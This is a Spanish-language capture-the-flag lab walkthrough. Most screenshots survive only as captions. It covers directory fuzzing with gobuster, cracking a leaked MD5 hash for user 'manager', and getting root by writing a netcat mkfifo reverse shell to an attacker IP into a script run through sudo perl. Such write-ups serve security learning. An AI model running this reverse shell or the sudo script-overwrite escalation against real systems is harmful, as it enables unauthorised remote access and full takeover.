NMAP

Resultado de escaneo NMAP

WEB

Interfaz Web Inicial

Fuzzing

Utilizando Gobuster para descubrir directorios:

gobuster dir -u http://10.10.109.205/ -w /usr/share/wordlists/dirb/common.txt
Resultado Inicial de Gobuster Resultado Continuado de Gobuster

Fuzzing en la ruta encontrada:

Fuzzing Detallado Inicial Fuzzing Detallado Continuación Fuzzing Detallado Más Datos Fuzzing Detallado Progreso Resultados de Fuzzing con Contraseñas Encontradas

Usuario encontrado: manager

Hash: 42f749ade7f9e195bf475f37a44cafcb

Descifrado de Hash

Contraseña descifrada: Password123

Uso de la Contraseña Acceso Concedido Operaciones Post Acceso

Abrimos una shell interactiva:

python -c 'import pty; pty.spawn("/bin/bash")'
Shell Interactiva Inicial

User Flag

Shell Interactiva Continuación Comandos en Shell Interactiva Más Comandos en Shell

Creación de un script para reverse shell:

echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.8.67.209 4444 >/tmp/f' > /etc/copy.sh
sudo /usr/bin/perl /home/itguy/backup.pl
Configuración del Script Ejecución del Script

Root Flag

cat /root/root.txt